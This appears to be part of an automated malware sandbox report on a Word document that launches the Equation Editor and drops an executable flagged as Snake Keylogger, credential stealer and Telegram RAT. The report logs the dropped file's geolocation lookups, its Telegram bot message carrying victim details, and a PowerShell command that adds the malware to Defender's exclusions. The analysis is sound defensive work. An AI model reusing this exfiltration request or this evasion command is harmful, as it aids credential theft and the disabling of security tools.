                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9RbkGSaXOjnIG4u4rpdcW9yR5QOJdaqiJgFYdUyOpowzKeB9NWDg%2F8EMuywkQE1M9YMCkxowUnlRG%2BSv6AjnDluvZQ6nJsijQa%2B9CIbsjfsVO1ETpwzDgmHt29pYgxu3ICrMiPRf"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9b5e4da6d2e17-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1823&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1590334&cwnd=245&unsent_bytes=0&cid=35105321c27f3e00&ts=152&x=0"
                                                                                                          2024-10-30 07:32:16 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.2249173188.114.96.34433872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:32:18 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:32:18 UTC885INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:18 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 21561
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zrJL9K5YIcyJxC0Bk%2FmktCXd6bB8DlFMpL3W170iyVSLl8B9Sjtt14Sk9A0%2FOL8oZLq4bE6qfb7LZ9AF20PR31ZjJGieWyKGRZG5qRoT8nt2%2FWW44G5aPxbetuKOuhuAHHsbDi5U"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9b5f0e936e524-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1052&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2704014&cwnd=252&unsent_bytes=0&cid=baf730b678c23efb&ts=147&x=0"
                                                                                                          2024-10-30 07:32:18 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.2249175188.114.97.34433872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:32:20 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:32:20 UTC897INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:20 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 21563
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cOen7WBV%2F%2FQDTsSymSZ9u7BQOm9GfIa9d3iwGXSCi9GwAE%2FLhOB%2FKR6eaXppY8Orb4PFEL81PdiNpwNmBMBF1JVZFv2ANR76%2F%2BSR9kyAj%2BgneJF3X6Jj3Rx%2BunxzW49Lt%2BpI8hQO"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9b5fbb8fd2e1e-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1338&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2109249&cwnd=251&unsent_bytes=0&cid=ddadc899d1cbda9e&ts=155&x=0"
                                                                                                          2024-10-30 07:32:20 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.2249177188.114.96.34433872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:32:22 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:32:22 UTC887INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:22 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 21565
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pFnL4vy7OE2Ygzx3idTScIcu8yHLlt2jBDNalnOAKeDMC73qgYgcgYCUTpaNOgy91pqpaS2C3b%2FnMSb5cLw2BQDWWTBUGNBIob7RfcpcBwiG%2FK3n3ujN%2FPvJT8xqS%2BQI7nmET07V"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9b607aca94696-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1090&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2535901&cwnd=251&unsent_bytes=0&cid=21cc2d88d2100fd2&ts=148&x=0"
                                                                                                          2024-10-30 07:32:22 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.2249179188.114.97.34433872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:32:24 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:32:24 UTC889INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:24 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 21567
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bLGyUrUWgqDAqrw01%2BejhPzPyri8NDmCYdBj6Ymk6%2BCgCafpb0I28PQE42sm44UpMWjI3eiUFHSBxSByg60m1zAHiih%2Bku1%2FIi8jaPs1%2FzWQGvGZNhwbg7rQptIvwkY5YMMNc5yV"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9b6170a7c6b43-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1755&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1545357&cwnd=242&unsent_bytes=0&cid=3c67f15e76ee2cf2&ts=152&x=0"
                                                                                                          2024-10-30 07:32:24 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.2249181188.114.97.34433872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:32:28 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:32:28 UTC885INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:28 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 21571
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nWfg99PkhVNJI8BgLMXwdtbBnKasUSrxf8SF0U%2FBNtXXBN4WN6WCS5kDSjDMejO%2BqRnjljxcrzIUmcSDBf4zWNNGf9AliBsLgyj8OZKcp4bB%2B7Wvc1EqvP6E9W5ckzl8pnbHoymE"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9b6303f6d4618-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1066&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2613718&cwnd=251&unsent_bytes=0&cid=e17a5262fad66795&ts=161&x=0"
                                                                                                          2024-10-30 07:32:28 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.2249182149.154.167.2204433872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:32:29 UTC353OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2010/30/2024%20/%208:13:13%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                          Host: api.telegram.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:32:30 UTC344INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 30 Oct 2024 07:32:29 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 55
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-10-30 07:32:30 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:03:31:54
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                          Imagebase:0x13f5d0000
                                                                                                          File size:1'423'704 bytes
                                                                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:03:31:56
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                          Imagebase:0x400000
                                                                                                          File size:543'304 bytes
                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:5
                                                                                                          Start time:03:32:03
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"
                                                                                                          Imagebase:0x1010000
                                                                                                          File size:787'456 bytes
                                                                                                          MD5 hash:F395BAA43F62DF879CA3F4810ECDCFB8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 71%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:6
                                                                                                          Start time:03:32:04
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"
                                                                                                          Imagebase:0x1210000
                                                                                                          File size:427'008 bytes
                                                                                                          MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:7
                                                                                                          Start time:03:32:04
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe"
                                                                                                          Imagebase:0x1010000
                                                                                                          File size:787'456 bytes
                                                                                                          MD5 hash:F395BAA43F62DF879CA3F4810ECDCFB8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.942629985.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:9
                                                                                                          Start time:03:32:23
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                          Imagebase:0x400000
                                                                                                          File size:543'304 bytes
                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Non-executed Functions

                                                                                                            Function 0068BE50 Relevance: .4, Instructions: 385COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.428467332.000000000067F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0067F000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_67f000_EQNEDT32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a0fbc8837469e0d4288a7b00476b23a0a848f9da41fb9020cead963f4a0dc1eb
                                                                                                            • Instruction ID: 2065121178364e011c88b688417f0fa6f9df0fe4d592663e3d4eefafc9e8b514
                                                                                                            • Opcode Fuzzy Hash: a0fbc8837469e0d4288a7b00476b23a0a848f9da41fb9020cead963f4a0dc1eb
                                                                                                            • Instruction Fuzzy Hash: CFA1AB9155E7C09FE307872898396607FB29F63654F4E82DBC1C5CF6E3D66A0919C322

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:21.5%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:2.3%
                                                                                                            Total number of Nodes:132
                                                                                                            Total number of Limit Nodes:0
